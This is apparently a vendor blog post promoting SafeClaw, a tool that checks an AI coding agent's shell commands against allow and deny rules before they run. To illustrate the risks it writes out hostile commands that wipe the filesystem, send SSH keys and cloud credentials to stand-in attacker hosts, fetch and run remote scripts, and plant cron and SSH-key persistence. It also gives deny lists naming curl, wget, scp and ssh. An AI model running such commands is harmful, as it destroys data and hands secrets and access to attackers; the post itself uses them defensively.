2026-01-07 · Authensor

Stop AI Agents from Running Dangerous Commands: Policy-Based Shell Gating

Your AI coding agent just ran rm -rf /. Or sudo chmod 777 /etc/passwd. Or curl -X POST https://pastebin.com/api -d "$(cat ~/.ssh/id_rsa)".

You weren't watching. You were getting coffee. The agent was "fixing a build error."

This isn't a thought experiment. AI coding agents have shell access by design. They run npm install, git commit, python manage.py migrate, and whatever else they determine is necessary to complete your task. The problem is that "whatever else" includes every command your user account has permission to execute.

The Commands That Should Never Run

Let's be specific about what's dangerous.

Destructive File Operations

rm -rf /                    # Wipes the entire filesystem
rm -rf ~                    # Wipes your home directory
rm -rf .                    # Wipes the current project
rm -rf node_modules && rm -rf /  # Starts legit, then doesn't

An agent trying to "clean up" a build might run rm -rf on a directory. One wrong path and your project is gone. One path traversal and your home directory is gone.

Privilege Escalation

sudo apt install something          # Agent doesn't need root
sudo chmod -R 777 /var/www          # Opens everything to everyone
sudo chown -R $(whoami) /etc        # Takes ownership of system files
su - root -c "curl http://x.com/s | bash"  # Root shell piped from internet

If your user has passwordless sudo (common on dev machines and CI), the agent has root. Full stop. Every command above executes without a password prompt.

Data Exfiltration via Shell

curl -X POST https://evil.com/collect -d @~/.aws/credentials
wget -qO- https://evil.com/c2 | bash
scp ~/.ssh/id_rsa user@attacker.com:/tmp/
cat /etc/shadow | nc attacker.com 4444

The agent doesn't need a sophisticated exploit. curl and cat are enough. Read a file, send it to a server. Two commands, one pipe.

Crypto Mining and Persistence

# Download and run a miner
curl -sL https://xmr.pool.com/miner.sh | bash

# Add a cron job for persistence
echo "*/5 * * * * curl https://evil.com/payload | bash" >> /var/spool/cron/crontabs/$(whoami)

# Add an SSH key for remote access
echo "ssh-rsa AAAA... attacker@host" >> ~/.ssh/authorized_keys

An agent that can write files and execute shell commands can establish persistence on your machine. A cron job or an authorized SSH key gives an attacker permanent access, even after you close the agent.

Package Supply Chain Attacks

npm install not-a-real-package-with-postinstall-script
pip install legitimate-name-typosquat
curl https://raw.githubusercontent.com/random/repo/main/install.sh | bash

Agents install packages. That's normal. But a malicious or confused agent could install a package with a post-install script that exfiltrates data, adds backdoors, or modifies your project. Typosquatting attacks in package registries are well-documented.

Why "Just Watch the Terminal" Doesn't Work

The standard advice is to monitor what your agent does. Review each command before approving.

This fails in practice for three reasons:

  1. Volume. A coding agent might execute 50-100 shell commands in a single task. Reviewing each one breaks the workflow and eliminates the productivity gains that justified using the agent.
  2. Speed. Commands execute in milliseconds. By the time you read curl -X POST... in your terminal, the request has already completed.
  3. Obfuscation. Commands can be encoded, piped, or aliased. echo "Y3VybCBodHRwczovL2V2aWwuY29t" | base64 -d | bash looks harmless if you're skimming -- it decodes to curl https://evil.com.

Manual review is a monitoring approach, not a prevention approach. It tells you what happened. It doesn't stop it from happening.

Policy-Based Shell Gating

SafeClaw implements shell_exec gating. Every shell command the agent attempts is evaluated against your policy before it executes. Not after. Before.

Example: Basic Safety Policy

{
  action: "shell_exec",
  defaultEffect: "deny",
  rules: [
    // Allow standard dev commands
    { command: "npm install", effect: "allow" },
    { command: "npm test", effect: "allow" },
    { command: "npm run *", effect: "allow" },
    { command: "git *", effect: "allow" },
    { command: "tsc *", effect: "allow" },
    { command: "node *", effect: "allow" },
    { command: "npx *", effect: "allow" },

    // Explicitly deny dangerous commands
    { command: "rm -rf *", effect: "deny" },
    { command: "sudo *", effect: "deny" },
    { command: "curl *", effect: "deny" },
    { command: "wget *", effect: "deny" },
    { command: "scp *", effect: "deny" },
    { command: "ssh *", effect: "deny" },
    { command: "chmod *", effect: "deny" },
    { command: "chown *", effect: "deny" }
  ]
}

The deny-by-default architecture is critical here. You don't need to anticipate every dangerous command. You only need to specify what's allowed. Everything else is blocked automatically.

Example: Allowing Specific Network Tools

Sometimes the agent legitimately needs curl -- to check if a local dev server is running, for instance.

{
  action: "shell_exec",
  rules: [
    // Allow curl only to localhost
    { command: "curl http://localhost*", effect: "allow" },
    { command: "curl http://127.0.0.1*", effect: "allow" },

    // Block curl to everything else
    { command: "curl *", effect: "deny" }
  ]
}

Rules are evaluated in order. The agent can curl localhost:3000/health to check the dev server. It cannot curl https://evil.com/exfiltrate.
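Under the hood this is first-match-wins evaluation: walk the rule list top to bottom, return the effect of the first pattern that matches, and fall back to the default effect if nothing matches. Here's a minimal sketch of that logic in TypeScript -- the names (Rule, globToRegExp, evaluate) are illustrative, not SafeClaw's actual API:

// Illustrative first-match policy evaluator -- the general shape of
// ordered glob rules with a default effect, not SafeClaw's real code.
type Effect = "allow" | "deny";
interface Rule { command: string; effect: Effect; }

// Turn a glob like "curl http://localhost*" into an anchored RegExp.
function globToRegExp(pattern: string): RegExp {
  const escaped = pattern.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
  return new RegExp("^" + escaped.replace(/\\\*/g, ".*") + "$");
}

function evaluate(command: string, rules: Rule[], defaultEffect: Effect = "deny"): Effect {
  for (const rule of rules) {
    if (globToRegExp(rule.command).test(command)) return rule.effect; // first match wins
  }
  return defaultEffect; // no rule matched: deny by default
}

const rules: Rule[] = [
  { command: "curl http://localhost*", effect: "allow" },
  { command: "curl *", effect: "deny" },
];
evaluate("curl http://localhost:3000/health", rules); // "allow"
evaluate("curl https://evil.com/exfiltrate", rules);  // "deny"

Because evaluation stops at the first match, the narrow localhost allows must sit above the broad curl * deny; flip the order and curl would be blocked everywhere.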

Example: Scoped Package Installation

{
  action: "shell_exec",
  rules: [
    // Allow installing specific packages
    { command: "npm install typescript", effect: "allow" },
    { command: "npm install @types/*", effect: "allow" },
    { command: "npm install --save-dev jest", effect: "allow" },

    // Allow install from lockfile (no new packages)
    { command: "npm ci", effect: "allow" },

    // Block general npm install (prevents unknown packages)
    { command: "npm install *", effect: "deny" }
  ]
}

This policy allows installing known dependencies but blocks the agent from adding unknown packages. npm ci is the safer install path because it installs exactly what's pinned in the lockfile -- the agent can't introduce new packages through it (though, as with any install, the locked packages' own install scripts still run).

What Happens When a Command Is Blocked

The agent receives a denial response. It doesn't crash. It doesn't hang. It gets a clear signal that the action was denied and why, then it adapts. Modern AI agents handle tool call failures gracefully -- they try an alternative approach or ask for guidance.
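The exact response shape is SafeClaw's to define, but the pattern looks roughly like this sketch, where the field names are hypothetical and for illustration only: the gate returns a structured denial as the tool result instead of throwing, so the model reads the reason like any other tool output.

// Hypothetical shape of a gated tool result -- illustrative only,
// not SafeClaw's actual response format.
interface ToolResult {
  ok: boolean;
  output?: string;  // stdout, when the command was allowed to run
  denial?: string;  // human- and model-readable reason, when it wasn't
}

function denyResult(command: string, matchedRule: string): ToolResult {
  return {
    ok: false,
    denial: `shell_exec denied by policy rule "${matchedRule}": ${command}`,
  };
}

// The agent receives this as the tool's return value and can route around it:
denyResult("curl https://evil.com/exfiltrate", "curl *");
// => { ok: false, denial: 'shell_exec denied by policy rule "curl *": ...' }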

Every blocked command is recorded in SafeClaw's tamper-evident audit trail (a SHA-256 hash chain). You get a complete record of what the agent tried to do, what was allowed, and what was denied. Any attempt to alter or delete an entry breaks the chain, so even an agent that compromises your system can't rewrite the record without leaving evidence of the tampering.
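The hash chain technique itself is simple: each entry's hash covers the previous entry's hash, linking the log end to end. A minimal sketch in TypeScript -- the entry fields here are illustrative, not SafeClaw's actual log format:

// Minimal SHA-256 hash chain -- the general technique, not SafeClaw's format.
import { createHash } from "node:crypto";

interface AuditEntry {
  ts: string;
  command: string;
  effect: "allow" | "deny";
  prevHash: string; // hash of the previous entry ("0" x 64 for the first)
  hash: string;     // sha256(prevHash + ts + command + effect)
}

function append(chain: AuditEntry[], command: string, effect: "allow" | "deny"): void {
  const prevHash = chain.length ? chain[chain.length - 1].hash : "0".repeat(64);
  const ts = new Date().toISOString();
  const hash = createHash("sha256").update(prevHash + ts + command + effect).digest("hex");
  chain.push({ ts, command, effect, prevHash, hash });
}

// Recompute every link from the start; a single edited or removed
// entry makes verification fail at that point in the chain.
function verify(chain: AuditEntry[]): boolean {
  let prev = "0".repeat(64);
  for (const e of chain) {
    const expected = createHash("sha256").update(prev + e.ts + e.command + e.effect).digest("hex");
    if (e.prevHash !== prev || e.hash !== expected) return false;
    prev = e.hash;
  }
  return true;
}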

Simulation Mode: Test Before You Enforce

SafeClaw's simulation mode evaluates every command against your policy and logs the result, but doesn't actually block anything. This lets you:

  1. See exactly what your agent does during a typical session
  2. Identify which commands your policy would block
  3. Tune your rules before switching to enforcement
  4. Avoid breaking your workflow with overly restrictive policies

Run simulation mode for a day or two. Review the logs. Adjust your policy. Then switch to enforcement with confidence.
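One practical way to review the logs: pull out every command that would have been denied and treat each one as a candidate allow rule. A rough sketch, assuming a simple hypothetical log format of one "ALLOW <cmd>" or "DENY <cmd>" per line:

// Turn a day of simulation logs into draft allow rules for review.
// The log format here is hypothetical, not SafeClaw's actual output.
import { readFileSync } from "node:fs";

const lines = readFileSync("simulation.log", "utf8").split("\n").filter(Boolean);

const wouldBlock = new Set<string>();
for (const line of lines) {
  const m = line.match(/^DENY (.+)$/);
  if (m) wouldBlock.add(m[1]);
}

// Review this list by hand; add allow rules only for commands you trust.
for (const cmd of wouldBlock) {
  console.log(JSON.stringify({ command: cmd, effect: "allow" }));
}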

The Numbers

SafeClaw's policy engine evaluates shell commands in sub-millisecond time. Local evaluation, no network round trips. The agent doesn't notice any latency.

446 automated tests in TypeScript strict mode. Zero third-party dependencies. The attack surface is the code itself, nothing else.

Getting Started

npx @authensor/safeclaw

Browser dashboard opens with a setup wizard. Define your shell execution policy, enable simulation mode, and start monitoring. No CLI configuration needed.

Works with Claude and OpenAI, and integrates with LangChain. Free tier available with renewable 7-day keys, no credit card required.

The client is 100% open source. Inspect every line. The control plane only sees metadata -- your commands, your code, and your policies stay local.

The Stakes

Clawdbot leaked over 1.5 million API keys in under a month. Shell access was a key vector. An agent that can run arbitrary commands can exfiltrate data, establish persistence, escalate privileges, and destroy files.

The fix isn't removing shell access. That makes the agent useless. The fix is gating shell access -- evaluating each command against a policy before it executes. Allow the commands your agent needs. Deny everything else.

That's what SafeClaw does. Visit safeclaw.onrender.com to set it up.

Try SafeClaw

Action-level gating for AI agents. Set it up in your browser in 60 seconds.

$ npx @authensor/safeclaw